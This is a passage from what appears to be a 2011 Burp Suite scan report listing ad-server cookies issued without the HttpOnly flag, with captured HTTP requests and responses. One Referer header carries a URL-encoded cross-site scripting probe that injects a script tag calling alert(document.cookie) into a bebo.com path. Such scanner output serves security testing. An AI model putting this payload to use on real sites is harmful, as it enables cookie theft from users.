!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!$=)YGq!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!$=+%/.!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; path=/; expires=Fri, 05-Jul-2013 11:22:11 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Wed, 06 Jul 2011 11:22:11 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

10.19. http://adonmax.com/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adonmax.com
Path:	/afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=604085l37; expires=Sat, 06-Aug-2011 14:19:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: adonmax.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:19:29 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: id=604085l37; expires=Sat, 06-Aug-2011 14:19:29 GMT
Content-Length: 334
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=uft8">
<title></title>
</head>
<body>
<a href="htt
...[SNIP]...

10.20. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_21Ju="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyT8cbdtxkQw36sCSYws02VZnJBV5kVSiK63S0EPqGm20LIDE9g+EqSScZygA5IU5+z66nnzLIa4a+7jtG5zGxdSOV8gUFMvADbUUtaV0aUFiT91q+ex1xkYsKntNNFsTWgrWvRLDQLcNSXvlo3q/KRLeq1Pt82RLf/iCbh+spqJnWAahKpqVwV1XfLfMqHxF1tt52T6X4XQJnlBkHE3Wh9VIiwTsaJC/Aq2Ad3J/wZkceWWAKEdn3cBVIemRNjLVhipHrU63PvzZh1oA2XIbv8Ol1lT1LA5j01RZ5k9XwOnC5XNzrIH1oz0isg0TzZW7wAl7g+OtStP75TuAqIoBh3pzL3nxQppOZbcyJtR8i+nwcV6W1s+9zZ0DRPaAUvy5sWJvgMGsbHK8j9BLddS6cOygwoKDBjGgUkE4h+R8lM2CGp4UoY3LPcymXrjZ7ITdLnOAgrLpNZX7oWm2WLksbc/dPc3bT2Y4F87eu5WmWG9pqQDYBG2hqDGgiWihTYZaXk85vn5wkZECD9XxqHxhGQG8uMFhiHYrV7GUHEGhnycIUcbYVXFWzJw45ZcDaGP53W/7kcSo6QWWOpU8KahGIE1luvVgDDeDprU9mHMUETCH1RKpzeF2tYYoADgWg1mZhWbLysDF30A85/mk/y08a5WXIrHcUO/89jMoeG/MHpq9qi88PH++kpKpgeolkyyCmBNUjSLe6lSf98K1wSSpGYcMKKBm00r2Pa5Ax5XjA1phGc1A2q3WPty6Jc89mIViybtCsaKvucMZ0x+CUSbRyT8Eu3gB2PAGcULlu4qbqfdCM8lJvkO0NcA8ErFngNyabbIW+nngn2CAX4iGqmok7lMQR5WbOF76OYQmgvjyUwTufILzg6XUOwjgbgodQtpc3VOjVC6wKFrq+e1uyFY8XG7R72ASfx61FUCYJunZDMLz7rO5GMQn/HUUZsSij6HWuBbuWoDjZCr+YFL3SrhaoHbdNv0KWOg2DyvNHYG7oEFZ4kNjozYVWp53qst38j0OcJF6lVAmZWVUQzCDjB6FZsXpFA/rNbFXwNlA56k9MCxvwLF2xnb4n2BWu/nIGtet5cYKjqiefRfVhzOI7W+WK6xu4I4g1SldqVcN5+xGhW08iGnmBJQCtMebPuzVs57PnlNG594/4M2ZlaVgiYXVDMqpYntiVuMwLui2KlpyBieSZohEvUpgVIc866H3cPxeiwwWwKR3MyumJg0unOjSFXohJQyZmQfW5dHaNKg8SBtalXffCnIO3VO9/m+epl8h/516tdq80AR8GGHK/oH/uQgYhPup0jy4wQ3x2XxFxVHxWekwsYRFACs4Im8ipdFuKel/fDp4Wcf4/wGHvG38kNUrYRLH/5IUfh1HslclbaPeX+9U/viEhoLftEnD17Dvw0vA4q5yeBDFnd+R6E/nNj1beItLdElbAMusvIEBzs4srCP/lMhCEh1yJFUv+zuqxT43RbuNwJaYnKoQesQHlZB1DDw9lcA+eAhrOGZq2Ouse4JJqWQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.21. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_Jawe="MLsXtSMNJjhrJoHUG+rUxPALFPJgvaBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyT8cbdgJmKm6Uzd+LKsNG9Nr+xb5hoDyIfWhw+AyVQ7u11QLOtzj88u2n9J3K7ReVCPIvh9QMt5DFcvzlWMwCQvebSXlqBAu2RernYAut1MCCV+q/24tw8FoIns/41iDbl7Tc65k6owP7f1eoi+MNbYeWmxZ2RSLSYsDJNVQhhlNlJBAYEQF1IX1fd5O2Lmz0H8o2YtUGzzNsWDIWBrTWenygUIPDIJza9mSq5LtgFoZie4Hj3cJkAASzZoXwejzlDel0cIF7Nybl2UsRTpgSCmcFnLdXIuQ8IiNoLTsPSbI4Yk9w0JKlK27ANpZihZ8/gX34NVR3rHtGa9gdEXZoGBjTf3VemUxRaBoL2vsgAaapfJWjhEizwWUAZsCaP3Bpvruf9ml4bcV0lOwZ6CxPLllW4JquG25Q8PZJub/bTnsWl/VPYGAvcSmXrrZ6IfdMlOAgTHwqZpxEDWGetOJWcFU5WXDn011Ocm7Oe2u9u7U3oBT7zW0MkxEoljqgdc6+7iVt3JwiOqCp3z5+h765zGr4E7B2hemzCGc8uRNtFU6nVK6iLkJy/sbS9yCIPHt+kA7HPfKFzlVvvhfT5GEJC8d9k0L5HCK82AdG4DpU4jOLpz07oKE6KfI6shEnGVMS4HHVVMWxIXGO61OhqXJleJLqCZdo/qJCaxceZ2/AneMa5dtZs3KD3uYQ9JhE9xqB1z7MdKfw4jqStKoC9TdaqXKT6Qpz14fRuCG5BdQjUz1OAuhWlbBuStygfcRLEvRx1Tr/dIWvpUV6mLVQ2HfVUrDKbpSy4WCFLn1yFEnJmyCBXj6CIDHFqm6dP+wjDF3IvmS8r0RVoLD+Xy4UwfJU9LO2O2uCzhfzYvJ6DlP0TyLCI08pGxvusn7MQhu6f8d+gwSO/wuAlFYKT4gUi536pSBPlffZ+hYuM4LUHXumDVUnEne+ZI8wqsnEOkZAf3YdxE2ucgy23gzDtyO/Gv5pknmXVtj5N8GtkD/7XGQ94udBr6Q0l7c3OtvYiqqrnjvE0cRjpWrVvhQ2lPK6bzZhUIz5rSjO6mGN9iCFTTYIeHp0i6Wd6L3jx3qSvh1BESO4AnMK3UDVokDXUESIeawx0wJ70+Jf+OCqte1J/xCixn0kPPZtX3R1QOASxlFw7tJXCNHE0YAW1SuwZeCr52n2uScW8peTuZdaeJn1V9th/CutD/BoEKJv/sFD047122a4o37IufAKNr+54TDtq6hx3mqrEsr7nkWsH0DhRw1lRiFuj4un3R+HDtLIDTsQV9tiJOKFJalV7v/t8CUmO6hrRuJMiFizHlAoUEPQJdMMfuwHZoBBcANP6yjQFTzNHF1HdwzXNsRsiW/dMEjRRfFhZEzzfzMA9Cit6Qj3G77OtyJ+IAtHlJNHMbL5DLxV6e+aDFjLgewz82pakSKJ8ceMMN66JOjNu7zcFjAeOvApEPMygQJzdeWxoaCEj8g/93w9n/jjGmhiSVQ7Dc2KZfhwLdD8hp1Zf5yu2M2ZWMg0IqWeINRtZJw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Jawe="MLsXtSMNJjhrJoHUG+rUxPALFPJgvaBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyT8cbdgJmKm6Uzd+LKsNG9Nr+xb5hoDyIfWhw+AyVQ7u11QLOtzj88u2n9J3K7ReVCPIvh9QMt5DFcvzlWMwCQvebSXlqBAu2RernYAut1MCCV+q/24tw8FoIns/41iDbl7Tc65k6owP7f1eoi+MNbYeWmxZ2RSLSYsDJNVQhhlNlJBAYEQF1IX1fd5O2Lmz0H8o2YtUGzzNsWDIWBrTWenygUIPDIJza9mSq5LtgFoZie4Hj3cJkAASzZoXwejzlDel0cIF7Nybl2UsRTpgSCmcFnLdXIuQ8IiNoLTsPSbI4Yk9w0JKlK27ANpZihZ8/gX34NVR3rHtGa9gdEXZoGBjTf3VemUxRaBoL2vsgAaapfJWjhEizwWUAZsCaP3Bpvruf9ml4bcV0lOwZ6CxPLllW4JquG25Q8PZJub/bTnsWl/VPYGAvcSmXrrZ6IfdMlOAgTHwqZpxEDWGetOJWcFU5WXDn011Ocm7Oe2u9u7U3oBT7zW0MkxEoljqgdc6+7iVt3JwiOqCp3z5+h765zGr4E7B2hemzCGc8uRNtFU6nVK6iLkJy/sbS9yCIPHt+kA7HPfKFzlVvvhfT5GEJC8d9k0L5HCK82AdG4DpU4jOLpz07oKE6KfI6shEnGVMS4HHVVMWxIXGO61OhqXJleJLqCZdo/qJCaxceZ2/AneMa5dtZs3KD3uYQ9JhE9xqB1z7MdKfw4jqStKoC9TdaqXKT6Qpz14fRuCG5BdQjUz1OAuhWlbBuStygfcRLEvRx1Tr/dIWvpUV6mLVQ2HfVUrDKbpSy4WCFLn1yFEnJmyCBXj6CIDHFqm6dP+wjDF3IvmS8r0RVoLD+Xy4UwfJU9LO2O2uCzhfzYvJ6DlP0TyLCI08pGxvusn7MQhu6f8d+gwSO/wuAlFYKT4gUi536pSBPlffZ+hYuM4LUHXumDVUnEne+ZI8wqsnEOkZAf3YdxE2ucgy23gzDtyO/Gv5pknmXVtj5N8GtkD/7XGQ94udBr6Q0l7c3OtvYiqqrnjvE0cRjpWrVvhQ2lPK6bzZhUIz5rSjO6mGN9iCFTTYIeHp0i6Wd6L3jx3qSvh1BESO4AnMK3UDVokDXUESIeawx0wJ70+Jf+OCqte1J/xCixn0kPPZtX3R1QOASxlFw7tJXCNHE0YAW1SuwZeCr52n2uScW8peTuZdaeJn1V9th/CutD/BoEKJv/sFD047122a4o37IufAKNr+54TDtq6hx3mqrEsr7nkWsH0DhRw1lRiFuj4un3R+HDtLIDTsQV9tiJOKFJalV7v/t8CUmO6hrRuJMiFizHlAoUEPQJdMMfuwHZoBBcANP6yjQFTzNHF1HdwzXNsRsiW/dMEjRRfFhZEzzfzMA9Cit6Qj3G77OtyJ+IAtHlJNHMbL5DLxV6e+aDFjLgewz82pakSKJ8ceMMN66JOjNu7zcFjAeOvApEPMygQJzdeWxoaCEj8g/93w9n/jjGmhiSVQ7Dc2KZfhwLdD8hp1Zf5yu2M2ZWMg0IqWeINRtZJw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4i2jMIYZ7ES1kb10eZfVkVm7iIJZBa5Z642kqPytE/lFy+9C7Its0hWRkE8F6vlyBe/9Trz9i3gmy4SmoNYf4RgLJ57l6XK2XM/zpxd+bWfKtBiH1p4PveCiA30MI78vG1slAzQEuI4Pj+v4BdLCmIoU5Yani/TSqHGz6VoMwG4CC7VGiDuesbxiXf2W2Iqk52/xeAS+0Rjlz2nwqJ6CfeZ4xISeLhfuygLAPAlgi3xGkXLZ5wezJstSrtcZvJqS5DcF4vEdvh0cSV7drZl3996CIo/lAKkqMjpJoN9EOahRHkbj76DE8ADMQwfo3txn/IZhZGxYdBlwhaEDOB+aFAWS+uNtb19XpabQhu5AgMMrXDR0tbd/Z4AveSJ+//M8i8Fp6O8tP7EwsqdbWF6A3E+uXrpIU5e5W8VMBQA2jr39wIlmH0e0a3kexbltOd9lpf9D/gz8AiZPbvNt3jaqCsnewupAsprKHp30HU9z7PEnSz2LIFkh2SycQUEy/0oeQ6kpjiC3Y7zkrhJNI5oheGtAtEZtSsH2km/NN0qMzYyTvrwurIlgwZfHcq642qtp0HAFYBszyc5HRY7z27QXKawd5eqdAiwI1sNzUV8GYgkzytrqTth+eZJtOkV6DgxzVxlrXY+5mc2